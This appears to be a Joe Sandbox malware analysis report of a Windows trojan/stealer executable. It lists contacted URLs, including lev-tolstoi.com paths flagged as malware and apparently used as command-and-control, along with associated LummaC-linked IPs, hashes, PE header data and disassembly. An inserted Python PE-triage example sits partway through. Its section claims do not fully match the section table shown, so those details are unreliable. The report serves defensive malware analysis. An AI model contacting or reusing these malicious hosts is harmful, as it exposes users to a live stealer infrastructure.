                                                                                                                                        https://checkout.steampowered.com/MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refMaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://lev-tolstoi.com/apixIMaZjv5XeQi.exe, 00000000.00000003.2233712383.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://lev-tolstoi.com/apih3MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              unknown
                                                                                                                                              https://store.steampowered.com/about/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://steamcommunity.com/my/wishlist/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://checkout.steampowMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://help.steampowered.com/en/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/market/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://store.steampowered.com/news/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiMaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://lev-tolstoi.com/MSWznTY69wwRW38B95MaZjv5XeQi.exe, 00000000.00000003.2233252191.00000000057B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            unknown
                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://store.steampowered.com/subscriber_agreement/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://lev-tolstoi.com/MSWznTY69wwRW38B95-MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2182870338.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2207101478.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2181402365.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206927029.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206818863.00000000057AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  unknown
                                                                                                                                                                  https://lev-tolstoi.com/V4MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  unknown
                                                                                                                                                                  https://recaptcha.net/recaptcha/;MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://lev-tolstoi.com/piy7MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpfalse
Avira URL Cloud: malware; reputation: unknown (antivirus and reputation columns of the URL row that precedes this section)

URL | Source (process, memory dump) | Malicious | Antivirus detection | Reputation
https://lev-tolstoi.com/apis | MaZjv5XeQi.exe, 00000000.00000003.2286706213.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://login.steamp | MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/discussions/ | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.f | MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/stats/ | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://medal.tv | MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/steam_refunds/ | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900 | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/WC | MaZjv5XeQi.exe, 00000000.00000003.2207101478.00000000057AF000.00000004.00000800.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2206927029.00000000057AC000.00000004.00000800.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2206818863.00000000057AC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/workshop/ | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.steampowered.com/ | MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | MaZjv5XeQi.exe, 00000000.00000003.2182887020.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/legal/ | MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp; MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENET, US | false
172.67.157.254 | unknown | United States | 13335 | CLOUDFLARENET, US | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-AS, US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580922
Start date and time: 2024-12-26 13:13:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 1s
Hypervisor-based inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis mode: default
Analysis stop reason: Timeout
Sample name: MaZjv5XeQi.exe (renamed because the original name is a hash value)
Original sample name: 20460f73ddd6da12a34a1bc6911b0538.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@12/3
EGA information:
• Successful, ratio: 100%
HCA information: Failed
Cookbook comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: MaZjv5XeQi.exe
Time | Type | Description
07:14:10 | API Interceptor | 11x Sleep call for process: MaZjv5XeQi.exe modified
Related samples by IP address

Match | Associated sample name / URL | Detection | Threat name | Context
104.21.66.86 | MV ROCKET_PDA.exe | malicious | FormBook | www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
172.67.157.254 | jT7sgjdTea.exe | malicious | LummaC |
172.67.157.254 | Y4svWfRK1L.exe | malicious | LummaC |
172.67.157.254 | YKri2nEBWE.exe | malicious | LummaC |
172.67.157.254 | GtEVo1eO2p.exe | malicious | LummaC |
172.67.157.254 | SPFFah2O2q.exe | malicious | LummaC |
172.67.157.254 | 4KDKJjRzm8.exe | malicious | LummaC |
172.67.157.254 | i8Vwc7iOaG.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar |
172.67.157.254 | 6GNqkkKY0j.exe | malicious | LummaC |
172.67.157.254 | Ebgl8jb6CW.exe | malicious | LummaC |
172.67.157.254 | 3zg6i6Zu1u.exe | malicious | LummaC |
104.102.49.254 | r4xiHKy8aM.exe | malicious | Socks5Systemz | /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.948476636577372
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: MaZjv5XeQi.exe
File size: 1'847'808 bytes
MD5: 20460f73ddd6da12a34a1bc6911b0538
SHA1: 643fdda94defd6dc666e446dac08887c6799d9ef
SHA256: c25a7ddb2f76edf74c0174c631be03fca999cc3052e47f7a47ea41dc92657780
SHA512: 6c92c7115c5e0e5f5b736458fd021374b9d7eae9b233d1e6a7c51c0542be780b168a5cb19865be3d5ae0f35ccdcaa21f50fccf9d87ef43f825aa85b493358034
SSDEEP: 49152:DkKqj8OXX8pBwwFzkOFIH8SQn+BY2qWIfa:aQ487TFzkOFY8r+agI
TLSH: E68533311E14097DC2EEE5767893EEC7FF619C0EE7848465272E4BA985A7F84E039B40
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................H...........@...........................I...........@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x88d000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
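The fields above are what an analyst reads before detonation: an 8-bit entropy of 7.948 (8.0 is uniformly random), an entry point at 0x88d000 that lies in a section named .taggant rather than .text, an empty TLS callback list, and a COFF timestamp of 0x67695986 that decodes to 23 Dec 2024 12:37:26 UTC. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it re-derives those fields from raw PE32 bytes with the standard library only and applies the usual packer heuristics (whole-file and entry-point-section entropy, entry point outside .text, non-printable section names, presence of a TLS directory). Its input is constructed inline by build_pe(); the section layout, the oddly named third section and the alignment values are assumptions for the demo, not the layout of MaZjv5XeQi.exe, and the only value reused from the report is the timestamp.

```python
"""Static PE32 triage, added example (not Joe Sandbox or sample code); input built by build_pe()."""
import math
import re
import struct
from collections import Counter
from datetime import datetime, timezone

SAFE_SECTION_NAME = re.compile(r"^[A-Za-z0-9._$@-]+$")  # anything else counts as "special chars"


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (8.0 = uniformly random)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def format_timestamp(ts: int) -> str:
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def parse_pe(data: bytes) -> dict:
    """DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]                 # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections, timestamp, opt_size = struct.unpack_from("<2xHI8xH2x", data, pe_off + 4)
    opt = pe_off + 24                                                # optional header follows the 20-byte COFF header
    magic, entry_rva, image_base = struct.unpack_from("<H14xI8xI", data, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    _tls_rva, tls_size = struct.unpack_from("<II", data, opt + 96 + 9 * 8)  # data directory 9 = TLS
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.split(b"\0", 1)[0].decode("latin-1"), "va": va,
                         "vsize": vsize, "raw": data[raw_ptr:raw_ptr + raw_size]})
    return {"entry_rva": entry_rva, "image_base": image_base, "timestamp": timestamp,
            "tls_directory": tls_size != 0, "sections": sections}


def triage(data: bytes) -> dict:
    """Report-style summary plus the packer indicators an analyst checks before detonation."""
    pe = parse_pe(data)
    ep_sec = next((s for s in pe["sections"]
                   if s["va"] <= pe["entry_rva"] < s["va"] + max(s["vsize"], len(s["raw"]))), None)
    findings = []
    file_entropy = shannon_entropy(data)
    if file_entropy > 7.0:
        findings.append(f"high file entropy {file_entropy:.3f} (packed/encrypted payload)")
    if ep_sec is None:
        findings.append("entry point outside every section")
    elif ep_sec["name"] != ".text":
        findings.append(f"entry point in non-standard section {ep_sec['name']!r}")
    if ep_sec and shannon_entropy(ep_sec["raw"]) > 7.0:
        findings.append("entry-point section is high-entropy (unpacking stub likely)")
    for s in pe["sections"]:
        if not SAFE_SECTION_NAME.match(s["name"]):
            findings.append(f"section with special chars in name: {s['name']!r}")
    if pe["tls_directory"]:
        findings.append("TLS directory present (callbacks run before the entry point)")
    return {"entrypoint": f"0x{pe['image_base'] + pe['entry_rva']:x}",
            "entrypoint_section": ep_sec["name"] if ep_sec else None, "entropy": round(file_entropy, 3),
            "timestamp": format_timestamp(pe["timestamp"]), "findings": findings}


def build_pe(packed: bool) -> bytes:
    """Constructed PE32 with an assumed layout; packed=True mimics the indicators seen above."""
    align = 0x200
    stub = b"\x55\x8b\xec\x33\xc0\x5d\xc3".ljust(align, b"\0")  # push ebp; mov ebp,esp; xor eax,eax; pop ebp; ret
    if packed:
        secs = [(b".text", 0x1000, stub),
                (b".taggant", 0x2000, bytes(range(256)) * 4),  # uniform byte histogram: entropy 8.0
                (b".\x8f\x01d", 0x3000, b"\x90" * align)]      # assumed section name with non-printable bytes
        entry_rva = 0x2010                                      # entry point lands in .taggant
    else:
        secs = [(b".text", 0x1000, stub), (b".rdata", 0x2000, b"hello\0".ljust(align, b"\0"))]
        entry_rva = 0x1000                                      # entry point in .text, as a linker emits it
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0x67695986, 0, 0, 224, 0x0102)  # i386; timestamp from report
    opt = bytearray(224)
    struct.pack_into("<H14xI8xI", opt, 0, 0x10B, entry_rva, 0x400000)  # magic, AddressOfEntryPoint, ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, align)                    # SectionAlignment, FileAlignment
    struct.pack_into("<HH", opt, 68, 2, 0x8040)                        # GUI subsystem; DYNAMIC_BASE|TERMINAL_SERVER_AWARE
    struct.pack_into("<I", opt, 92, 16)                                # NumberOfRvaAndSizes
    table, body, raw_ptr = b"", b"", align
    for name, va, raw in secs:
        table += struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += raw
        raw_ptr += len(raw)
    return (dos + b"PE\0\0" + coff + bytes(opt) + table).ljust(align, b"\0") + body


if __name__ == "__main__":
    print(triage(build_pe(packed=True)), triage(build_pe(packed=False)), sep="\n")
```

Pass the bytes of any real PE32 file to triage() to get the same summary. On the constructed input the whole-file entropy stays low because zero-padded headers and stub code dominate, which is why the check is also applied to the entry-point section alone, where it fires; on the real sample the file-level value of 7.948 already exceeds the threshold. The parser deliberately stops at PE32 (magic 0x10b): PE32+ moves ImageBase and the data directories, and reading them at the PE32 offsets would silently produce wrong entry-point and TLS results.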
Instruction
jmp 00007FEB1CAC2DCAh
movups xmm3, dqword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FEB1CAC4DC5h
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax+000000FEh], ah
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x52000 | 0x26400 | 1f30e7a8639eadc725c7aca2c93ec44c | False | 0.9995021446078431 | data | 7.977266846622565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x53000 | 0x1ac | 0x200 | c4249243ceaeb236e3ce8ce2ab2c9a69 | False | 0.5390625 | data | 5.249019796122045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x55000 | 0x29d000 | 0x200 | 6a6da0fd3d2ca1fb8e8eadb4e3ce4d01 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
